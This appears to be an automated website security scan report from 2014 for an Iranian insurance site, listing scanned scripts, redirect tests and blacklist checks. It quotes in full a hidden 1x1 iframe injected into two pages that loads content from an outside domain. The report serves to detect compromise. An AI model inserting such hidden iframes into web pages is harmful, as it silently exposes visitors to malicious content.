Scanned pages/files
Request | Server response | Status |
http://bazarebimeh.ir/ | 200 OK Content-Length: 15679 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 517 websites. size: 1x1 style: hidden src: http://www.joomi.ir/dl/google.html <iframe style="display:none;" src="http://www.joomi.ir/dl/google.html" width=1 height=1> | ||
http://bazarebimeh.ir/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: application/javascript | clean |
http://bazarebimeh.ir/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: application/javascript | clean |
http://bazarebimeh.ir/media/system/js/mootools-more.js | 200 OK Content-Length: 238331 Content-Type: application/javascript | clean |
http://bazarebimeh.ir/templates/jm_galaxy/zt_menus/zt_megamenu/zt.megamenu.rtl.js | 200 OK Content-Length: 3416 Content-Type: application/javascript | clean |
http://bazarebimeh.ir/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: application/javascript | clean |
http://bazarebimeh.ir/templates/jm_galaxy/js/zt.script.js | 200 OK Content-Length: 1581 Content-Type: application/javascript | clean |
http://bazarebimeh.ir/modules/mod_zt_headline/assets/js/jquery-1.7.1.min.js | 200 OK Content-Length: 93868 Content-Type: application/javascript | clean |
http://bazarebimeh.ir/modules/mod_zt_headline/assets/js/plugins.js | 200 OK Content-Length: 8299 Content-Type: application/javascript | clean |
http://bazarebimeh.ir/modules/mod_zt_headline/assets/js/jquery.nivo.slider.js | 200 OK Content-Length: 27066 Content-Type: application/javascript | clean |
http://bazarebimeh.ir/index.php/component/content/article?id= | 404 Not Found Content-Length: 1819 Content-Type: text/html | clean |
http://bazarebimeh.ir/index.php | 200 OK Content-Length: 15688 Content-Type: text/html | suspicious |
Hidden iFrame found. The same iFrame was found in 517 websites. size: 1x1 style: hidden src: http://www.joomi.ir/dl/google.html <iframe style="display:none;" src="http://www.joomi.ir/dl/google.html" width=1 height=1> | ||
http://bazarebimeh.ir/test404page.js | 404 Not Found Content-Length: 389 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bazarebimeh.ir
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 09 May 2014 14:57:30 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 288e13b6e286f51c81753dc7083a18ad=ffe0972593c3bc0354b50e7e488c959c; path=/
Set-Cookie: jm_galaxy_tpl=jm_galaxy; expires=Wed, 29-Apr-2015 14:57:30 GMT; path=/
Set-Cookie: guan_ismobile=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: PHP/5.3.17
GET / HTTP/1.1
Host: bazarebimeh.ir
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Fri, 09 May 2014 14:57:30 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 288e13b6e286f51c81753dc7083a18ad=ffe0972593c3bc0354b50e7e488c959c; path=/
Set-Cookie: jm_galaxy_tpl=jm_galaxy; expires=Wed, 29-Apr-2015 14:57:30 GMT; path=/
Set-Cookie: guan_ismobile=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
X-Powered-By: PHP/5.3.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: bazarebimeh.ir
Referer: http://www.google.com/search?q=bazarebimeh.ir
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bazarebimeh.ir
Referer: http://www.google.com/search?q=bazarebimeh.ir
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bazarebimeh.ir
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bazarebimeh.ir/
Result: bazarebimeh.ir is not infected or malware details are not published yet.
Result: bazarebimeh.ir is not infected or malware details are not published yet.